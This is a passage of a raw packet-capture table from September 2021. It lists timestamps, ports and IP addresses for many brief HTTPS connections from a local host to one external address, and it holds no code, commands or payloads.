Sep 28, 2021 07:59:11.420136929 CEST	443	49997	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:11.420330048 CEST	49997	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:11.423837900 CEST	49997	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:11.423882961 CEST	443	49997	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:11.484390020 CEST	443	49997	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:11.489608049 CEST	49997	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:11.489670992 CEST	443	49997	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:11.489974022 CEST	49997	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:11.490008116 CEST	443	49997	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:11.596298933 CEST	443	49997	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:11.596393108 CEST	443	49997	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:11.596843958 CEST	49997	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:11.598000050 CEST	49997	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:11.600234985 CEST	49998	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:11.600313902 CEST	443	49998	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:11.600481033 CEST	49998	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:11.601083994 CEST	49998	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:11.601119041 CEST	443	49998	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:11.665899038 CEST	443	49998	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:11.669790983 CEST	49998	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:11.669852972 CEST	443	49998	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:11.669971943 CEST	49998	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:11.669986963 CEST	443	49998	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:11.835315943 CEST	443	49998	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:11.835688114 CEST	443	49998	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:11.835774899 CEST	49998	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:11.836951017 CEST	49998	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:11.838913918 CEST	49999	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:11.838968992 CEST	443	49999	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:11.839066029 CEST	49999	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:11.839637041 CEST	49999	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:11.839653015 CEST	443	49999	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:11.901988029 CEST	443	49999	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:11.906367064 CEST	49999	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:11.906433105 CEST	443	49999	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:11.906735897 CEST	49999	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:11.906749964 CEST	443	49999	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:12.145854950 CEST	443	49999	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:12.145953894 CEST	443	49999	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:12.148034096 CEST	49999	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:12.150585890 CEST	50000	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:12.150657892 CEST	443	50000	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:12.155442953 CEST	50000	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:12.155471087 CEST	49999	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:12.155508041 CEST	50000	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:12.155529022 CEST	443	50000	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:12.212445974 CEST	443	50000	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:12.217222929 CEST	50000	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:12.217297077 CEST	443	50000	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:12.218050003 CEST	50000	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:12.218063116 CEST	443	50000	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:12.334671021 CEST	443	50000	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:12.335566044 CEST	443	50000	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:12.338570118 CEST	50001	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:12.338612080 CEST	50000	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:12.338639021 CEST	443	50001	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:12.338654041 CEST	50000	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:12.343969107 CEST	50001	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:12.344022989 CEST	50001	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:12.344037056 CEST	443	50001	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:12.419406891 CEST	443	50001	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:12.423635960 CEST	50001	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:12.423697948 CEST	443	50001	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:12.423787117 CEST	50001	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:12.423795938 CEST	443	50001	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:12.532753944 CEST	443	50001	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:12.532845020 CEST	443	50001	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:12.533932924 CEST	50001	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:12.535135984 CEST	50001	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:12.537060976 CEST	50002	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:12.537132025 CEST	443	50002	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:12.537255049 CEST	50002	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:12.554616928 CEST	50002	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:12.554670095 CEST	443	50002	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:12.612915993 CEST	443	50002	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:12.618061066 CEST	50002	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:12.618144035 CEST	443	50002	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:12.619992971 CEST	50002	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:12.620044947 CEST	443	50002	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:12.724488020 CEST	443	50002	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:12.724586010 CEST	443	50002	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:12.724675894 CEST	50002	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:12.725799084 CEST	50002	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:12.730592966 CEST	50003	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:12.730645895 CEST	443	50003	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:12.732405901 CEST	50003	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:12.732460976 CEST	50003	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:12.732474089 CEST	443	50003	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:12.797066927 CEST	443	50003	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:12.801333904 CEST	50003	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:12.801371098 CEST	443	50003	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:12.803807020 CEST	50003	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:12.803829908 CEST	443	50003	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:12.911256075 CEST	443	50003	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:12.911345005 CEST	443	50003	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:12.914242983 CEST	50004	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:12.914316893 CEST	443	50004	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:12.914413929 CEST	50004	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:12.915008068 CEST	50004	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:12.915045023 CEST	443	50004	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:12.918937922 CEST	50003	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:12.918981075 CEST	50003	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:12.978252888 CEST	443	50004	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:12.981667995 CEST	50004	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:12.981728077 CEST	443	50004	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:12.983175039 CEST	50004	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:12.983197927 CEST	443	50004	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:13.099522114 CEST	443	50004	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:13.099740028 CEST	443	50004	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:13.107285023 CEST	50004	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:13.107320070 CEST	50004	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:13.109627008 CEST	50005	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:13.109700918 CEST	443	50005	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:13.111875057 CEST	50005	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:13.115955114 CEST	50005	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:13.115978003 CEST	443	50005	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:13.185429096 CEST	443	50005	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:13.189824104 CEST	50005	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:13.189866066 CEST	443	50005	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:13.190226078 CEST	50005	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:13.190243006 CEST	443	50005	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:13.290513039 CEST	443	50005	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:13.290616989 CEST	443	50005	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:13.291065931 CEST	50005	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:13.292232037 CEST	50005	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:13.294389963 CEST	50006	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:13.294456959 CEST	443	50006	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:13.294553041 CEST	50006	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:13.295155048 CEST	50006	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:13.295180082 CEST	443	50006	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:13.353255987 CEST	443	50006	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:13.357280016 CEST	50006	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:13.357356071 CEST	443	50006	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:13.357508898 CEST	50006	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:13.357527971 CEST	443	50006	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:13.555705070 CEST	443	50006	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:13.555789948 CEST	443	50006	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:13.555869102 CEST	50006	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:13.557404995 CEST	50006	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:13.559905052 CEST	50007	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:13.559962988 CEST	443	50007	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:13.560265064 CEST	50007	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:13.560946941 CEST	50007	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:13.560981035 CEST	443	50007	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:13.617436886 CEST	443	50007	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:13.621588945 CEST	50007	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:13.621663094 CEST	443	50007	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:13.621798038 CEST	50007	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:13.621813059 CEST	443	50007	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:13.719830990 CEST	443	50007	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:13.719929934 CEST	443	50007	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:13.720067978 CEST	50007	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:13.721191883 CEST	50007	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:13.723186970 CEST	50008	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:13.723249912 CEST	443	50008	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:13.723331928 CEST	50008	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:13.724033117 CEST	50008	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:13.724059105 CEST	443	50008	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:13.781091928 CEST	443	50008	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:13.784010887 CEST	50008	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:13.784059048 CEST	443	50008	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:13.784255028 CEST	50008	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:13.784264088 CEST	443	50008	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:13.887048006 CEST	443	50008	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:13.887176991 CEST	443	50008	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:13.887392044 CEST	50008	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:13.888631105 CEST	50008	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:13.891383886 CEST	50009	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:13.891446114 CEST	443	50009	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:13.891566038 CEST	50009	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:13.892230988 CEST	50009	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:13.892266989 CEST	443	50009	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:13.949165106 CEST	443	50009	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:13.953695059 CEST	50009	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:13.953772068 CEST	443	50009	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:13.953929901 CEST	50009	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:13.953946114 CEST	443	50009	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:14.119019032 CEST	443	50009	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:14.119110107 CEST	443	50009	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:14.119252920 CEST	50009	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:14.120292902 CEST	50009	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:14.122251987 CEST	50010	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:14.122301102 CEST	443	50010	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:14.122385979 CEST	50010	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:14.123014927 CEST	50010	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:14.123044968 CEST	443	50010	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:14.185203075 CEST	443	50010	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:14.190826893 CEST	50010	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:14.192617893 CEST	443	50010	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:14.193842888 CEST	50010	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:14.193866968 CEST	443	50010	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:14.281804085 CEST	443	50010	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:14.281897068 CEST	443	50010	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:14.282273054 CEST	50010	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:14.283483028 CEST	50010	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:14.284965992 CEST	50011	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:14.285027027 CEST	443	50011	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:14.285161018 CEST	50011	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:14.285578012 CEST	50011	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:14.285609007 CEST	443	50011	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:14.342050076 CEST	443	50011	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:14.346570015 CEST	50011	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:14.346657038 CEST	443	50011	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:14.346790075 CEST	50011	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:14.346805096 CEST	443	50011	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:14.448560953 CEST	443	50011	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:14.448638916 CEST	443	50011	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:14.448741913 CEST	50011	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:14.449893951 CEST	50011	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:14.451651096 CEST	50012	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:14.451718092 CEST	443	50012	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:14.451874971 CEST	50012	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:14.452439070 CEST	50012	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:14.452464104 CEST	443	50012	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:14.508769035 CEST	443	50012	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:14.512790918 CEST	50012	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:14.512841940 CEST	443	50012	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:14.512957096 CEST	50012	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:14.512965918 CEST	443	50012	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:14.671268940 CEST	443	50012	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:14.671360016 CEST	443	50012	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:14.671499014 CEST	50012	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:14.672617912 CEST	50012	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:14.674820900 CEST	50013	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:14.674875021 CEST	443	50013	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:14.674963951 CEST	50013	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:14.676002979 CEST	50013	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:14.676033020 CEST	443	50013	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:14.734051943 CEST	443	50013	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:14.738014936 CEST	50013	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:14.738066912 CEST	443	50013	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:14.738171101 CEST	50013	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:14.738188982 CEST	443	50013	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:14.850591898 CEST	443	50013	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:14.850667000 CEST	443	50013	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:14.850806952 CEST	50013	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:14.851819038 CEST	50013	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:14.853569031 CEST	50014	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:14.853619099 CEST	443	50014	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:14.853714943 CEST	50014	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:14.854327917 CEST	50014	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:14.854350090 CEST	443	50014	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:14.911890030 CEST	443	50014	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:14.916045904 CEST	50014	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:14.916110992 CEST	443	50014	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:14.916251898 CEST	50014	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:14.916270018 CEST	443	50014	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:15.022197962 CEST	443	50014	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:15.022306919 CEST	443	50014	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:15.022428989 CEST	50014	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:15.023685932 CEST	50014	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:15.026154041 CEST	50015	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:15.026211977 CEST	443	50015	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:15.026329041 CEST	50015	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:15.026998997 CEST	50015	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:15.027035952 CEST	443	50015	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:15.083409071 CEST	443	50015	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:15.088062048 CEST	50015	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:15.088112116 CEST	443	50015	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:15.088247061 CEST	50015	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:15.088267088 CEST	443	50015	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:15.193146944 CEST	443	50015	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:15.193247080 CEST	443	50015	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:15.193723917 CEST	50015	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:15.194777966 CEST	50015	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:15.196758986 CEST	50016	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:15.196811914 CEST	443	50016	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:15.196964979 CEST	50016	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:15.197663069 CEST	50016	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:15.197693110 CEST	443	50016	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:15.254466057 CEST	443	50016	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:15.258425951 CEST	50016	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:15.258482933 CEST	443	50016	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:15.258590937 CEST	50016	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:15.258605957 CEST	443	50016	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:15.383241892 CEST	443	50016	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:15.383362055 CEST	443	50016	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:15.386451960 CEST	50016	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:15.387607098 CEST	50016	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:15.389543056 CEST	50017	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:15.389612913 CEST	443	50017	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:15.389772892 CEST	50017	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:15.390383005 CEST	50017	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:15.390403986 CEST	443	50017	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:15.447554111 CEST	443	50017	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:15.451364994 CEST	50017	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:15.451422930 CEST	443	50017	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:15.451581001 CEST	50017	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:15.451598883 CEST	443	50017	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:15.567241907 CEST	443	50017	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:15.567327976 CEST	443	50017	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:15.567496061 CEST	50017	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:15.568725109 CEST	50017	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:15.570612907 CEST	50018	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:15.570668936 CEST	443	50018	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:15.570797920 CEST	50018	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:15.571341038 CEST	50018	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:15.571369886 CEST	443	50018	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:15.639522076 CEST	443	50018	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:15.645263910 CEST	50018	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:15.645298958 CEST	443	50018	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:15.645463943 CEST	50018	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:15.645478010 CEST	443	50018	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:15.744576931 CEST	443	50018	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:15.746100903 CEST	443	50018	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:15.746186972 CEST	50018	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:15.747402906 CEST	50018	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:15.749161959 CEST	50019	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:15.749208927 CEST	443	50019	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:15.760431051 CEST	50019	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:15.760526896 CEST	50019	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:15.760540962 CEST	443	50019	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:15.818217039 CEST	443	50019	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:15.821233988 CEST	50019	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:15.821269035 CEST	443	50019	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:15.821379900 CEST	50019	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:15.821393967 CEST	443	50019	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:15.922122002 CEST	443	50019	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:15.922204971 CEST	443	50019	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:15.923882961 CEST	50019	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:15.925982952 CEST	50019	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:15.927669048 CEST	50020	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:15.927717924 CEST	443	50020	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:15.933166981 CEST	50020	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:15.934098959 CEST	50020	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:15.934113979 CEST	443	50020	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:15.990093946 CEST	443	50020	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:15.994550943 CEST	50020	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:15.994596958 CEST	443	50020	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:15.995026112 CEST	50020	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:15.995047092 CEST	443	50020	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:16.098654032 CEST	443	50020	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:16.098738909 CEST	443	50020	149.154.167.220	192.168.2.4
